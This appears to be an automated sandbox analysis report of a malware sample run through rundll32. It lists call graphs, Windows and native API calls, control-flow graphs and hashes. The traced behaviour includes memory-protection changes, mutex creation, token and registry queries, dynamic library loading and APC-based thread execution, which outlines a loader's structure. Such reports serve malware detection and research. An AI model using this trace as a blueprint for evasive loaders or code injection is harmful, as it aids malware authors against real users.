lstrcmp 14716->14717 14720 27ff74e7836 14717->14720 14719 27ff74e1e58 2 API calls 14718->14719 14718->14722 14719->14722 14721 27ff74e1504 lstrcmp 14720->14721 14720->14722 14721->14722 14464 27ff74c55c9 14465 27ff74debd4 6 API calls 14464->14465 14466 27ff74c55ce 14465->14466 14467 27ff74e10cc 2 API calls 14466->14467 14468 27ff74c55ef 14466->14468 14467->14468 14742 27ff74e54d3 14745 27ff74e3930 14742->14745 14744 27ff74e54de 14747 27ff74e395a 14745->14747 14746 27ff74e39b4 14746->14744 14747->14746 14748 27ff74c5d98 2 API calls 14747->14748 14748->14746 14749 27ff74e56d4 14751 27ff74e56de 14749->14751 14750 27ff74c5d98 2 API calls 14752 27ff74e5b2c 14750->14752 14751->14750 14751->14752 13975 27ff74d7c6c 13976 27ff74d7c7b 13975->13976 13977 27ff74d7c97 13975->13977 13976->13977 13979 27ff74ea4bc 13976->13979 13980 27ff74ea4f3 HeapCreate 13979->13980 13982 27ff74ea537 13980->13982 13984 27ff74ea52f 13980->13984 13983 27ff74ea5e1 VirtualAlloc 13982->13983 13982->13984 13985 27ff74ea6fc 13982->13985 13983->13985 13986 27ff74ea629 13983->13986 13984->13977 13985->13984 13991 27ff74ca92c 13985->13991 13987 27ff74ea6e9 VirtualFree 13986->13987 13987->13985 13993 27ff74ca944 13991->13993 13992 27ff74ca983 13995 27ff74e6e1c 13992->13995 13993->13992 13994 27ff74ca97a FindCloseChangeNotification 13993->13994 13994->13992 13996 27ff74e6e65 13995->13996 13997 27ff74e6e73 StrRChrA 13996->13997 14000 27ff74e6e88 13996->14000 13997->14000 13999 27ff74e6f83 13999->13984 14005 27ff74ef7ec 14000->14005 14001 27ff74e6eed 14001->13999 14002 27ff74e6f7b 14001->14002 14003 27ff74e6f65 RtlAddVectoredContinueHandler 14001->14003 14013 27ff74ec164 14002->14013 14003->14002 14007 27ff74ef809 14005->14007 14006 27ff74ef926 14006->14001 14007->14006 14008 27ff74ef882 NtQueryInformationToken 14007->14008 14009 27ff74ef8bd 14008->14009 14010 27ff74ef918 NtClose 14009->14010 14011 27ff74ef8c5 NtQueryInformationToken 14009->14011 14010->14006 14012 27ff74ef8f2 14011->14012 14012->14010 14014 27ff74ec19b 14013->14014 14015 27ff74ec223 CreateMutexExA 14014->14015 14016 27ff74ec255 14014->14016 14017 27ff74ec242 14015->14017 14016->13999 14017->14016 14018 27ff74ec4b9 GetUserNameA 14017->14018 14019 27ff74ec4d6 14018->14019 14020 27ff74ec667 14019->14020 14025 27ff74ec688 14019->14025 14084 27ff74e1504 14019->14084 14020->14016 14020->14025 14087 27ff74debd4 14020->14087 14025->14016 14069 27ff74c91fc 14025->14069 14026 27ff74ec71d 14027 27ff74ec767 14026->14027 14093 27ff74e20f8 14026->14093 14072 27ff74e0f8c 14027->14072 14029 27ff74ec77e 14079 27ff74d638c 14029->14079 14031 27ff74ec783 14032 27ff74ec88b 14031->14032 14033 27ff74ec80b 14031->14033 14035 27ff74ec859 14032->14035 14036 27ff74ec89f 14032->14036 14052 27ff74ec852 14032->14052 14034 27ff74ec80d 14033->14034 14033->14035 14037 27ff74ec84d 14034->14037 14038 27ff74ec815 14034->14038 14121 27ff74ccb8c 14035->14121 14048 27ff74ec8dc 14036->14048 14050 27ff74ec8af 14036->14050 14113 27ff74d671c 14037->14113 14040 27ff74ec81d 14038->14040 14041 27ff74ec843 14038->14041 14043 27ff74ec839 14040->14043 14040->14050 14040->14052 14109 27ff74e0ad0 14041->14109 14101 27ff74cbf44 14043->14101 14044 27ff74ec83e 14044->14016 14128 27ff74ee864 14044->14128 14049 27ff74cd064 lstrcmp 14048->14049 14048->14052 14049->14052 14050->14052 14117 27ff74cd064 14050->14117 14052->14016 14133 27ff74e10cc CreateThread 14052->14133 14055 27ff74ecb54 14064 27ff74ecb4f 14055->14064 14145 27ff74d076c 14055->14145 14056 27ff74eca1f 14058 27ff74e10cc 2 API calls 14056->14058 14062 27ff74eca53 14058->14062 14059 27ff74e10cc 2 API calls 14059->14016 14060 27ff74d076c 4 API calls 14060->14064 14061 27ff74eca98 14066 27ff74e10cc 2 API calls 14061->14066 14067 27ff74ecafa 14061->14067 14062->14061 14136 27ff74c6818 14062->14136 14064->14016 14064->14059 14065 27ff74ecb7a 14065->14060 14066->14067 14067->14016 14067->14064 14141 27ff74d32e4 14067->14141 14070 27ff74d076c 4 API calls 14069->14070 14071 27ff74c9221 14070->14071 14071->14026 14152 27ff74ea864 14072->14152 14074 27ff74e0fb9 14075 27ff74e0fca RegQueryValueExA 14074->14075 14076 27ff74e1001 14074->14076 14075->14076 14078 27ff74e1090 14076->14078 14156 27ff74e1e58 14076->14156 14078->14029 14080 27ff74ea864 2 API calls 14079->14080 14081 27ff74d63a8 14080->14081 14082 27ff74d63b2 RegQueryValueExA 14081->14082 14083 27ff74d63ee 14081->14083 14082->14083 14083->14031 14159 27ff74e2e50 14084->14159 14088 27ff74debfd 14087->14088 14163 27ff74c8690 14088->14163 14090 27ff74dec45 14091 27ff74decda 14090->14091 14092 27ff74c8690 6 API calls 14090->14092 14091->14025 14092->14090 14094 27ff74e211c 14093->14094 14095 27ff74d076c 4 API calls 14094->14095 14098 27ff74e24ba 14094->14098 14099 27ff74e23ae 14094->14099 14096 27ff74e23a2 14095->14096 14096->14099 14198 27ff74e087c 14096->14198 14098->14027 14099->14098 14100 27ff74e10cc 2 API calls 14099->14100 14100->14098 14104 27ff74cbf62 14101->14104 14106 27ff74cc079 14104->14106 14208 27ff74f1600 14104->14208 14105 27ff74c8690 6 API calls 14107 27ff74cc002 14105->14107 14106->14044 14107->14106 14108 27ff74c8690 6 API calls 14107->14108 14108->14107 14111 27ff74e0af9 14109->14111 14110 27ff74e0b19 14110->14044 14111->14110 14112 27ff74c6818 6 API calls 14111->14112 14112->14110 14116 27ff74d6738 14113->14116 14114 27ff74d6918 14114->14052 14115 27ff74e10cc 2 API calls 14115->14114 14116->14114 14116->14115 14120 27ff74cd080 14117->14120 14118 27ff74cd185 14118->14052 14120->14118 14216 27ff74df560 14120->14216 14122 27ff74ccb9f 14121->14122 14123 27ff74ccbd7 14122->14123 14124 27ff74ccbbc 14122->14124 14127 27ff74ccbd5 14123->14127 14249 27ff74c9b84 14123->14249 14126 27ff74c6818 6 API calls 14124->14126 14126->14127 14127->14044 14129 27ff74d076c 4 API calls 14128->14129 14131 27ff74ee880 14129->14131 14259 27ff74ddc90 14131->14259 14132 27ff74ee8ec 14132->14052 14134 27ff74e110a QueueUserAPC 14133->14134 14135 27ff74e111d 14133->14135 14134->14135 14135->14016 14135->14055 14135->14056 14137 27ff74c8690 6 API calls 14136->14137 14139 27ff74c6848 14137->14139 14138 27ff74c68a7 14138->14061 14139->14138 14140 27ff74c8690 6 API calls 14139->14140 14140->14139 14142 27ff74d3309 14141->14142 14143 27ff74d337e 14142->14143 14262 27ff74c82f0 14142->14262 14143->14064 14146 27ff74ea864 2 API calls 14145->14146 14147 27ff74d079e 14146->14147 14148 27ff74d07a8 RegQueryValueExA 14147->14148 14149 27ff74d0839 14147->14149 14150 27ff74d082e RegCloseKey 14148->14150 14151 27ff74d07cf 14148->14151 14149->14065 14150->14149 14151->14150 14153 27ff74ea887 RegCreateKeyA 14152->14153 14154 27ff74ea894 RegOpenKeyA 14152->14154 14155 27ff74ea89f 14153->14155 14154->14155 14155->14074 14157 27ff74ea864 2 API calls 14156->14157 14158 27ff74e1e92 14157->14158 14158->14078 14160 27ff74e151b 14159->14160 14162 27ff74e2ea5 14159->14162 14160->14019 14161 27ff74e2f77 lstrcmp 14161->14162 14162->14160 14162->14161 14164 27ff74c86bb 14163->14164 14169 27ff74c86c3 14163->14169 14176 27ff74d1ac4 NtQueryInformationProcess 14164->14176 14166 27ff74c87ca 14166->14090 14169->14166 14170 27ff74d7dd8 14169->14170 14178 27ff74efeb8 14169->14178 14171 27ff74d7e15 14170->14171 14175 27ff74d7e2f 14171->14175 14192 27ff74e1458 VirtualProtect 14171->14192 14174 27ff74d7ef6 VirtualProtect 14174->14175 14175->14169 14177 27ff74d1af4 14176->14177 14177->14169 14179 27ff74e2e50 lstrcmp 14178->14179 14180 27ff74efef5 14179->14180 14181 27ff74e1458 VirtualProtect 14180->14181 14183 27ff74f006f 14180->14183 14182 27ff74eff1d 14181->14182 14182->14183 14194 27ff74ce1d8 14182->14194 14183->14169 14185 27ff74effdc VirtualProtect 14186 27ff74f000d 14185->14186 14190 27ff74d1ac4 NtQueryInformationProcess 14186->14190 14187 27ff74eff4d 14187->14183 14187->14185 14188 27ff74e1458 VirtualProtect 14187->14188 14189 27ff74eff97 14188->14189 14189->14185 14191 27ff74eff9b VirtualProtect 14189->14191 14190->14183 14191->14185 14193 27ff74d7edb 14192->14193 14193->14174 14193->14175 14195 27ff74ce2ab 14194->14195 14196 27ff74ce20c 14194->14196 14195->14187 14196->14195 14197 27ff74efeb8 5 API calls 14196->14197 14197->14195 14199 27ff74e09dc 14198->14199 14201 27ff74e089f 14198->14201 14200 27ff74e1e58 2 API calls 14199->14200 14203 27ff74e093d 14200->14203 14201->14203 14204 27ff74c5d98 14201->14204 14203->14099 14205 27ff74c5dc2 14204->14205 14206 27ff74e10cc 2 API calls 14205->14206 14207 27ff74c5e23 14205->14207 14206->14207 14207->14203 14209 27ff74cbfe3 14208->14209 14211 27ff74f1635 14208->14211 14209->14105 14211->14209 14212 27ff74f1310 14211->14212 14213 27ff74f13b4 14212->14213 14215 27ff74f138f 14212->14215 14214 27ff74f1448 LoadLibraryA 14213->14214 14213->14215 14214->14215 14215->14211 14217 27ff74df59a 14216->14217 14219 27ff74df5af 14217->14219 14220 27ff74c27e8 14217->14220 14219->14118 14221 27ff74c282a 14220->14221 14223 27ff74c2891 14221->14223 14226 27ff74e676c 14221->14226 14224 27ff74c29ab 14223->14224 14225 27ff74e676c lstrcmp 14223->14225 14224->14219 14225->14224 14227 27ff74e67ca 14226->14227 14228 27ff74e69cc 14227->14228 14231 27ff74e6ab8 14227->14231 14240 27ff74e67f6 14227->14240 14228->14240 14241 27ff74d17b8 14228->14241 14231->14240 14245 27ff74de8c8 14231->14245 14232 27ff74d17b8 lstrcmp 14234 27ff74e6a54 14232->14234 14236 27ff74d17b8 lstrcmp 14234->14236 14234->14240 14236->14240 14237 27ff74de8c8 lstrcmp 14238 27ff74e6b42 14237->14238 14239 27ff74de8c8 lstrcmp 14238->14239 14238->14240 14239->14240 14240->14223 14243 27ff74d17f5 14241->14243 14242 27ff74d19b1 14242->14232 14242->14240 14243->14242 14244 27ff74e2e50 lstrcmp 14243->14244 14244->14242 14246 27ff74de8f0 14245->14246 14247 27ff74e2e50 lstrcmp 14246->14247 14248 27ff74de909 14246->14248 14247->14248 14248->14237 14248->14240 14251 27ff74c9bb4 14249->14251 14250 27ff74c9d51 14250->14127 14251->14250 14252 27ff74d076c 4 API calls 14251->14252 14253 27ff74c9ca2 14252->14253 14253->14250 14255 27ff74c9d84 14253->14255 14257 27ff74c9dbf 14255->14257 14256 27ff74c9ea6 14256->14250 14257->14256 14258 27ff74c8690 6 API calls 14257->14258 14258->14256 14260 27ff74ea864 2 API calls 14259->14260 14261 27ff74ddccf 14260->14261 14261->14132 14263 27ff74c831b 14262->14263 14264 27ff74c8323 14262->14264 14263->14143 14264->14263 14265 27ff74e10cc 2 API calls 14264->14265 14265->14263 14490 27ff74ef668 14491 27ff74ef6d9 14490->14491 14492 27ff74ef6ee 14491->14492 14493 27ff74d7910 lstrcmp 14491->14493 14493->14492 14781 27ff74e5763 14782 27ff74e576c 14781->14782 14783 27ff74e592b 14781->14783 14782->14783 14784 27ff74c5d98 2 API calls 14782->14784 14784->14783 14785 27ff74e2960 14787 27ff74e2992 14785->14787 14786 27ff74e29ef 14787->14786 14788 27ff74ccb8c 10 API calls 14787->14788 14788->14786 14266 27ff7501169 14267 27ff75010aa 14266->14267 14268 27ff7501255 NtProtectVirtualMemory 14267->14268 14269 27ff750133a 14267->14269 14268->14269 14270 27ff75012a6 14268->14270 14270->14269 14271 27ff75012ee NtProtectVirtualMemory 14270->14271 14271->14269 14271->14270 14516 27ff74e5688 14517 27ff74d2f0c 3 API calls 14516->14517 14518 27ff74e56b8 14517->14518 14805 27ff74e5588 14806 27ff74e55a3 14805->14806 14807 27ff74d2f0c 3 API calls 14806->14807 14808 27ff74e55cc 14806->14808 14807->14808 14812 27ff74e2d84 14815 27ff74c9420 14812->14815 14820 27ff74d6f80 14815->14820 14819 27ff74c949f 14821 27ff74d702d 14820->14821 14823 27ff74d6f9e 14820->14823 14822 27ff74ef1d4 3 API calls 14821->14822 14822->14823 14824 27ff74d708d 14823->14824 14826 27ff74c943f 14823->14826 14827 27ff74d70c0 14823->14827 14825 27ff74e1e58 2 API calls 14824->14825 14825->14826 14826->14819 14829 27ff74e6064 14826->14829 14827->14826 14828 27ff74e1e58 2 API calls 14827->14828 14828->14826 14830 27ff74e609f 14829->14830 14831 27ff74d076c 4 API calls 14830->14831 14842 27ff74e6238 14830->14842 14832 27ff74e60d5 14831->14832 14833 27ff74e676c lstrcmp 14832->14833 14832->14842 14834 27ff74e61a4 14833->14834 14835 27ff74e1504 lstrcmp 14834->14835 14834->14842 14836 27ff74e61c9 14835->14836 14837 27ff74e1504 lstrcmp 14836->14837 14836->14842 14838 27ff74e61ee 14837->14838 14839 27ff74e1504 lstrcmp 14838->14839 14838->14842 14840 27ff74e6213 14839->14840 14841 27ff74e1504 lstrcmp 14840->14841 14840->14842 14841->14842 14842->14819 14843 27ff74f0580 14845 27ff74f05af 14843->14845 14844 27ff74f05ca 14845->14844 14847 27ff74e5f7c 14845->14847 14848 27ff74e5fbd 14847->14848 14849 27ff74e5f8b 14847->14849 14848->14844 14850 27ff74e6fc4 3 API calls 14849->14850 14850->14848 14874 27ff74ca994 14875 27ff74ca9bc 14874->14875 14876 27ff74caa8c 14875->14876 14877 27ff74d7910 lstrcmp 14875->14877 14877->14876 14272 27ff74c8690 14273 27ff74c86bb 14272->14273 14278 27ff74c86c3 14272->14278 14274 27ff74d1ac4 NtQueryInformationProcess 14273->14274 14274->14278 14275 27ff74c87ca 14276 27ff74d7dd8 2 API calls 14276->14278 14277 27ff74efeb8 5 API calls 14277->14278 14278->14275 14278->14276 14278->14277 14526 27ff74d2e28 14528 27ff74d2e56 14526->14528 14527 27ff74d2ebf 14528->14527 14530 27ff74e6fc4 14528->14530 14531 27ff74e7021 14530->14531 14532 27ff74e8108 3 API calls 14531->14532 14533 27ff74e70cc 14531->14533 14532->14533 14533->14527 14893 27ff74e5b3d 14894 27ff74e5b49 14893->14894 14896 27ff74e5b58 14894->14896 14897 27ff74e2da0 14894->14897 14899 27ff74e2dc0 14897->14899 14898 27ff74e2e31 14898->14896 14899->14898 14900 27ff74e1e58 2 API calls 14899->14900 14900->14898 14545 27ff74de03c 14546 27ff74de11e 14545->14546 14547 27ff74de078 14545->14547 14547->14546 14548 27ff74e1e58 2 API calls 14547->14548 14549 27ff74de109 14548->14549 14550 27ff74c9d84 6 API calls 14549->14550 14550->14546 14558 27ff74e5636 14559 27ff74e564e 14558->14559 14560 27ff74e5670 14558->14560 14561 27ff74d2f0c 3 API calls 14559->14561 14561->14560 14910 27ff74e5b33 14911 27ff74e087c 4 API calls 14910->14911 14912 27ff74e5b3b 14911->14912 14610 27ff74d3650 14612 27ff74d3671 14610->14612 14611 27ff74d3704 14612->14611 14613 27ff74e17c8 3 API calls 14612->14613 14613->14611

                                                                                                                                              Executed Functions

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InformationQueryToken$Close
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 459398573-4108050209
                                                                                                                                              • Opcode ID: 75f5f25a32e44abd967634ea221ebc7d1d7f2de2e2c95ac0f277a3d61ca82601
                                                                                                                                              • Instruction ID: 00640c67e728f861381397131da5a96f642ff8705ead1d7b67dbfc66dc0cba2c
                                                                                                                                              • Opcode Fuzzy Hash: 75f5f25a32e44abd967634ea221ebc7d1d7f2de2e2c95ac0f277a3d61ca82601
                                                                                                                                              • Instruction Fuzzy Hash: 4B41083021CB498FD7A4EF19D88879AB7E5FB98311F40492EE58EC7290DB349A05CB42
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Virtual$AllocCreateFreeHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2341667014-0
                                                                                                                                              • Opcode ID: 0e2db259d8c6b1358d19cfe41b628647c1408c81e58ecea94120c053d597cdbc
                                                                                                                                              • Instruction ID: 5374c87b6fce29ffbc475174ef12e8995b05df32b3e79941f36285b34a7d00f9
                                                                                                                                              • Opcode Fuzzy Hash: 0e2db259d8c6b1358d19cfe41b628647c1408c81e58ecea94120c053d597cdbc
                                                                                                                                              • Instruction Fuzzy Hash: DB91607061CB098FE798EB2898897AA73E5FB94311F40413DE58BC3691EF38D8468752
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexNameUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3764123871-0
                                                                                                                                              • Opcode ID: fffaa4b755b4794267c42af2f427b21d38ec734e3ecc3f810019e9c7598c9933
                                                                                                                                              • Instruction ID: 9eeb0516c3aa59229700ddd7891dda895bced64ba7840f87bdde0379e1249603
                                                                                                                                              • Opcode Fuzzy Hash: fffaa4b755b4794267c42af2f427b21d38ec734e3ecc3f810019e9c7598c9933
                                                                                                                                              • Instruction Fuzzy Hash: 7F72C47061CA4ACFE7A8EF28E98967977E1F754310F50453ED44BC3AE1DE3498428B92
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 387 27ff7501002-27ff750106b 390 27ff7501071-27ff750108a 387->390 391 27ff750135b-27ff7501373 387->391 392 27ff7501090-27ff7501099 390->392 393 27ff7501255-27ff75012a0 NtProtectVirtualMemory 390->393 398 27ff7501376-27ff7501388 391->398 392->393 397 27ff750109f-27ff75010a7 392->397 395 27ff75012a6-27ff75012a7 393->395 396 27ff750133a-27ff750133c 393->396 400 27ff75012ab-27ff75012ad 395->400 396->398 399 27ff750133e-27ff7501359 396->399 401 27ff75010aa-27ff75010b6 397->401 399->398 400->398 402 27ff75012b3-27ff75012b7 400->402 403 27ff75010d4-27ff7501102 401->403 404 27ff75010b8-27ff75010b9 401->404 407 27ff75012cf-27ff75012d3 402->407 408 27ff75012b9-27ff75012cd 402->408 413 27ff7501246-27ff7501247 403->413 414 27ff7501108-27ff7501119 403->414 405 27ff75010bb-27ff75010d2 404->405 405->403 405->405 409 27ff75012d5-27ff75012e9 407->409 410 27ff75012eb-27ff75012ec 407->410 412 27ff75012ee-27ff7501334 NtProtectVirtualMemory 408->412 409->412 410->412 412->396 412->400 417 27ff750124c-27ff750124f 413->417 415 27ff750112f-27ff750114b 414->415 416 27ff750111b-27ff7501120 414->416 419 27ff7501221-27ff7501224 415->419 420 27ff7501151-27ff750118f 415->420 416->415 418 27ff7501122-27ff750112a 416->418 417->393 417->398 422 27ff750122a-27ff750123e 418->422 419->398 419->422 425 27ff7501191-27ff7501199 420->425 426 27ff75011b8-27ff75011d8 420->426 422->401 424 27ff7501244 422->424 424->417 427 27ff75011a4-27ff75011b5 425->427 428 27ff750119b-27ff75011a2 425->428 430 27ff75011da 426->430 431 27ff75011dd-27ff75011df 426->431 427->426 428->427 428->428 430->431 432 27ff75011e1-27ff7501203 431->432 433 27ff7501213-27ff750121c 431->433 432->419 434 27ff7501205-27ff750120e 432->434 433->419 434->420
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000027.00000002.847405092.0000027FF7501000.00000040.00000001.sdmp, Offset: 0000027FF7501000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_39_2_27ff7501000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2706961497-0
                                                                                                                                              • Opcode ID: 37d0f459fa47460dc0f1faec055400dbd8bf25196c52ed08d60f78cc46762e5f
                                                                                                                                              • Instruction ID: 34c214ad148d008810025b7c92820178d8ec012d82ddf8fc88de2d02cc6b9e40
                                                                                                                                              • Opcode Fuzzy Hash: 37d0f459fa47460dc0f1faec055400dbd8bf25196c52ed08d60f78cc46762e5f
                                                                                                                                              • Instruction Fuzzy Hash: 5DB1F93120CB864FDBA8DF28D9857A9B3E1FB95300F58457DD48FC7692DA34A4068793
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 602 27ff74d1ac4-27ff74d1af2 NtQueryInformationProcess 603 27ff74d1af4-27ff74d1afc 602->603 604 27ff74d1b1f-27ff74d1b2c 602->604 603->604 605 27ff74d1afe-27ff74d1b09 603->605 606 27ff74d1b1a-27ff74d1b1d 605->606 606->604 607 27ff74d1b0b-27ff74d1b13 606->607 607->604 608 27ff74d1b15-27ff74d1b18 607->608 608->606
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InformationProcessQuery
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1778838933-0
                                                                                                                                              • Opcode ID: 1b5ff2e331e8eff1cde1f90d4881bb7eda4a5dda6d44182f68fae4d6ac00e22a
                                                                                                                                              • Instruction ID: 34a62c856204d8590af19b7a34eedbe2a018d6f667dfcae4e17d7932e3453646
                                                                                                                                              • Opcode Fuzzy Hash: 1b5ff2e331e8eff1cde1f90d4881bb7eda4a5dda6d44182f68fae4d6ac00e22a
                                                                                                                                              • Instruction Fuzzy Hash: 4801213031C94A8FE7D4EF69D5C8A35B7E1FBA8305B95056DD849C3194FA34D485CB12
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateQueryValue
                                                                                                                                              • String ID: ($(
                                                                                                                                              • API String ID: 2711935003-222463766
                                                                                                                                              • Opcode ID: e12b90d25e48638c248cf623991a1d23c50be5cb427306bedcf9ef54acb60cae
                                                                                                                                              • Instruction ID: 7273adcb05b5fd4dfa14c186637161f7cd4ccd0f81e630b3f4d55b8e0c7fb295
                                                                                                                                              • Opcode Fuzzy Hash: e12b90d25e48638c248cf623991a1d23c50be5cb427306bedcf9ef54acb60cae
                                                                                                                                              • Instruction Fuzzy Hash: 29317E3460C789CFF384EF54E8587A5B3E1F798314F50862EE48AC26A1DF789544CB02
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 335 27ff74f1310-27ff74f138d 336 27ff74f13b4-27ff74f13e0 335->336 337 27ff74f138f-27ff74f13af 335->337 338 27ff74f13f6-27ff74f13fa 336->338 339 27ff74f13e2-27ff74f13f4 336->339 342 27ff74f15e6-27ff74f15fd 337->342 341 27ff74f13fe-27ff74f140a 338->341 339->341 343 27ff74f140c-27ff74f141b 341->343 344 27ff74f1428-27ff74f142b 341->344 356 27ff74f15bc-27ff74f15c6 343->356 357 27ff74f1421-27ff74f1422 343->357 345 27ff74f1431-27ff74f1434 344->345 346 27ff74f14ff-27ff74f1507 344->346 347 27ff74f1448-27ff74f1459 LoadLibraryA 345->347 348 27ff74f1436-27ff74f1446 345->348 349 27ff74f1509-27ff74f1516 346->349 350 27ff74f1518-27ff74f151b 346->350 352 27ff74f145b-27ff74f146f 347->352 353 27ff74f14b3-27ff74f14bd 347->353 348->347 348->353 349->350 354 27ff74f15b8-27ff74f15b9 350->354 355 27ff74f1521-27ff74f1524 350->355 372 27ff74f1483-27ff74f14ae 352->372 373 27ff74f1471-27ff74f1481 352->373 358 27ff74f14ef-27ff74f14f0 353->358 359 27ff74f14bf-27ff74f14c3 353->359 354->356 364 27ff74f1526-27ff74f1529 355->364 365 27ff74f154f-27ff74f1563 355->365 360 27ff74f15c8-27ff74f15dd 356->360 361 27ff74f15e3-27ff74f15e4 356->361 357->344 366 27ff74f14f8-27ff74f14f9 358->366 359->366 367 27ff74f14c5-27ff74f14d6 359->367 360->361 361->342 364->365 369 27ff74f152b-27ff74f1536 364->369 365->354 376 27ff74f1565-27ff74f1579 365->376 366->346 367->366 378 27ff74f14d8-27ff74f14ed 367->378 369->365 370 27ff74f1538-27ff74f153d 369->370 370->365 374 27ff74f153f-27ff74f1544 370->374 372->342 373->353 373->372 374->365 377 27ff74f1546-27ff74f154d 374->377 382 27ff74f157b-27ff74f1586 376->382 383 27ff74f1588-27ff74f158b 376->383 377->354 377->365 378->366 382->383 383->354 384 27ff74f158d-27ff74f15b4 383->384 384->354
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                              • String ID: H
                                                                                                                                              • API String ID: 1029625771-2852464175
                                                                                                                                              • Opcode ID: ea8b0be554912eee910b5f6e76d5c63edd561062f2e3a805656d28eae44b2b83
                                                                                                                                              • Instruction ID: b08ff3de4d3d37c73f727327433d68825aaef3e6777acb66b6f5475d92584660
                                                                                                                                              • Opcode Fuzzy Hash: ea8b0be554912eee910b5f6e76d5c63edd561062f2e3a805656d28eae44b2b83
                                                                                                                                              • Instruction Fuzzy Hash: 2AA1513050CB4A8FE795EF5CD8887A6B3E1FB98305F40462ED84AC76A1EF34D9458B52
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: 8ab32006bd1df6a701864ba7e3d69da663e7aed914991a2a5fb048f6e1491c04
                                                                                                                                              • Instruction ID: 975f2a3a26052c40a54f0f48bc98c396babc0c63e016e4ed42ef7182ba69cfde
                                                                                                                                              • Opcode Fuzzy Hash: 8ab32006bd1df6a701864ba7e3d69da663e7aed914991a2a5fb048f6e1491c04
                                                                                                                                              • Instruction Fuzzy Hash: D5615C7061CA0ACFE784EF29D589B65B7E0FB98310F50056AE44EC36A1DF34E941CB92
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ContinueHandlerVectored
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3758255415-0
